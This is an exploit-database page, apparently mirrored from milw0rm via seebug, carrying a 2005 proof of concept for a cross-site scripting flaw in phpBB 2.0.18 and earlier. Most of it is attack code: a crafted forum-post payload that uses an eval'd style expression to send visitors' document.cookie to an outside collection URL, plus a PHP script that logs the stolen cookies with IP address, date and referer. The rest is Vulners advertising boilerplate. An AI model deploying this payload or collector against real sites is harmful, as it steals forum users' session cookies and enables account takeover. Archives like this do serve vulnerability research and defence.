Lucene search
K

phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

phpBB 2.0.18 Remote XSS Cookie Disclosure Exploi

Code

                                                /******************************************************************

phpBB &#60;= 2.0.18 XSS Cookie Disclosure Proof of Concept
	-- &#39;the html is on exploit&#39;

original exploit by:  (cXIb8O3) - 12/16/2005
proof of concept by: jet
	-- http://jet.carbon-4.net/
	
		develop a pure, lucid mind, not 
		depending upon sound, flavor,
		touch, odor, or any quality.
				- the diamond sutra

******************************************************************/

phpbb code:

&#60;B C=&#34;&#62;&#34; &#39;&#39;style=&#39;font-size:0;color:#EFEFEF&#39;style=&#39;top:expression(eval(this.sss));&#39;sss=`i=new/**/Image();i.src=&#39;http://www.url.com/cookie/c.php?c=&#39;+document.cookie;this.sss=null`style=&#39;font-size:0; X=&#34;&#60;B &#34;&#62;&#39;&#60;/B&#62;

c.php:

&#60;?php
 $cookie = $_GET[&#39;c&#39;];
 $ip = getenv (&#39;REMOTE_ADDR&#39;);
 $date=date(&#34;m/d/Y g:i:s a&#34;);
 $referer=getenv (&#39;HTTP_REFERER&#39;);
 $fl = fopen(&#39;log.txt&#39;, &#39;a&#39;);
 fwrite($fl, &#34;\n&#34;.$ip.&#39; :: &#39;.$date.&#34;\n&#34;.$referer.&#34; :: &#34;.$cookie.&#34;\n&#34;);
 fclose($fl);
?&#62;

# milw0rm.com [2005-12-21]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
14